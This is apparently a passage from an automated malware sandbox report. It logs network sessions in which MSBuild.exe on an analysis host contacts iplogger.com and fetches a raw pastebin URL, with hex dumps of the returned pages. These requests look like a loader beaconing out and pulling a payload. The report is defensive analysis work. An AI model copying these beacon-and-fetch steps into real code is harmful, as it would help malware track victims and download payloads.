                    2024-09-16 19:21:11 UTC1369INData Raw: 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f 79 2e 73 70 6c
                    Data Ascii: ata.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_y.spl
                    2024-09-16 19:21:11 UTC1369INData Raw: 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a
                    Data Ascii: .wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-radius:
                    2024-09-16 19:21:11 UTC1369INData Raw: 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 69 6e 22
                    Data Ascii: :auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="domain"
                    2024-09-16 19:21:11 UTC149INData Raw: 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: tion='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:21:11 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.649739104.21.76.574431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:16 UTC68OUTGET /1djqU4 HTTP/1.1
                    Host: iplogger.com
                    Connection: Keep-Alive
                    2024-09-16 19:21:16 UTC1285INHTTP/1.1 403 Forbidden
                    Date: Mon, 16 Sep 2024 19:21:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                    Cross-Origin-Embedder-Policy: require-corp
                    Cross-Origin-Opener-Policy: same-origin
                    Cross-Origin-Resource-Policy: same-origin
                    Origin-Agent-Cluster: ?1
                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                    Referrer-Policy: same-origin
                    X-Content-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    cf-mitigated: challenge
                    2024-09-16 19:21:16 UTC699INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 71 37 65 6d 58 4e 54 6f 2b 5a 75 6a 6e 61 70 6b 6f 46 6b 50 37 39 59 32 34 74 48 58 66 70 6b 65 69 54 53 51 31 6a 6b 51 4e 49 75 76 4b 39 5a 52 48 54 52 68 59 37 58 4d 46 7a 68 4a 2f 4d 70 61 30 67 35 62 36 6d 7a 6e 4a 36 43 49 50 6c 68 75 51 50 52 38 44 39 75 4d 79 4e 63 48 7a 64 30 41 50 2b 38 43 36 62 4e 4b 44 50 45 3d 24 35 50 71 44 2b 77 30 6f 74 59 35 6f 47 30 53 41 73 69 53 54 57 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                    Data Ascii: cf-chl-out: q7emXNTo+ZujnapkoFkP79Y24tHXfpkeiTSQ1jkQNIuvK9ZRHTRhY7XMFzhJ/Mpa0g5b6mznJ6CIPlhuQPR8D9uMyNcHzd0AP+8C6bNKDPE=$5PqD+w0otY5oG0SAsiSTWg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                    2024-09-16 19:21:16 UTC1369INData Raw: 34 30 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                    Data Ascii: 40ef<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                    2024-09-16 19:21:16 UTC1369INData Raw: 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67
                    Data Ascii: MSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.theme-dark #challenge-error-text{background-image:url(data:image/svg
                    2024-09-16 19:21:16 UTC1369INData Raw: 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d
                    Data Ascii: Igdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuM
                    2024-09-16 19:21:16 UTC1369INData Raw: 2e 33 39 31 70 78 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68
                    Data Ascii: .391px}.feedback-content{align-content:space-between;display:inline-grid;height:100vh;margin:0;padding:0}.feedback-content .spacer{margin:0}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4rem}.h
                    2024-09-16 19:21:16 UTC1369INData Raw: 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c
                    Data Ascii: tLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url
                    2024-09-16 19:21:16 UTC1369INData Raw: 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 20 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28
                    Data Ascii: le}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (
                    2024-09-16 19:21:16 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 20 61 7b 63
                    Data Ascii: allenge-error-text{background-position:100%;padding-left:0;padding-right:34px}.challenge-content .spacer{margin:2rem 0}.challenge-content .loading-spinner{height:76.391px}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body a{c
                    2024-09-16 19:21:16 UTC1369INData Raw: 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e
                    Data Ascii: S4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}</style><meta http-equiv="refresh" conten
                    2024-09-16 19:21:16 UTC1369INData Raw: 75 69 69 70 6d 66 48 64 44 5a 66 67 42 46 6b 6d 38 59 6f 66 67 4f 74 55 74 34 44 47 62 61 6c 63 6f 30 46 55 35 72 6a 52 4d 79 44 33 6f 5f 59 6f 59 4c 33 44 67 4b 31 4a 47 53 79 56 68 6c 59 75 78 75 71 4b 6f 7a 77 4e 7a 75 6a 58 31 51 44 57 6b 4b 64 68 75 4b 41 51 34 55 5f 63 76 72 4d 4e 77 46 69 78 71 57 54 6e 63 53 31 61 63 62 42 45 67 5f 77 36 36 72 67 43 63 37 59 76 58 43 34 30 68 45 57 58 33 7a 4d 37 4b 46 68 62 39 54 76 48 6f 44 67 2e 35 77 32 77 68 41 4d 6b 6a 54 4e 41 59 4b 39 4d 65 69 6f 2e 71 30 44 30 70 5a 76 50 55 38 41 74 33 5f 71 4e 51 62 79 62 64 6b 70 4b 46 72 4b 77 78 36 68 6b 7a 6a 46 35 34 4d 44 4e 77 68 76 44 6e 39 4d 63 30 36 39 58 32 36 66 4a 67 47 47 66 67 5a 61 67 6c 5f 53 51 76 48 32 48 6d 73 57 32 53 32 57 34 79 50 39 5a 2e 79 6b
                    Data Ascii: uiipmfHdDZfgBFkm8YofgOtUt4DGbalco0FU5rjRMyD3o_YoYL3DgK1JGSyVhlYuxuqKozwNzujX1QDWkKdhuKAQ4U_cvrMNwFixqWTncS1acbBEg_w66rgCc7YvXC40hEWX3zM7KFhb9TvHoDg.5w2whAMkjTNAYK9Meio.q0D0pZvPU8At3_qNQbybdkpKFrKwx6hkzjF54MDNwhvDn9Mc069X26fJgGGfgZagl_SQvH2HmsW2S2W4yP9Z.yk


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.649740104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:17 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:21:17 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c4337fcc9788ce0-EWR
                    2024-09-16 19:21:17 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:21:17 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:21:17 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:21:17 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
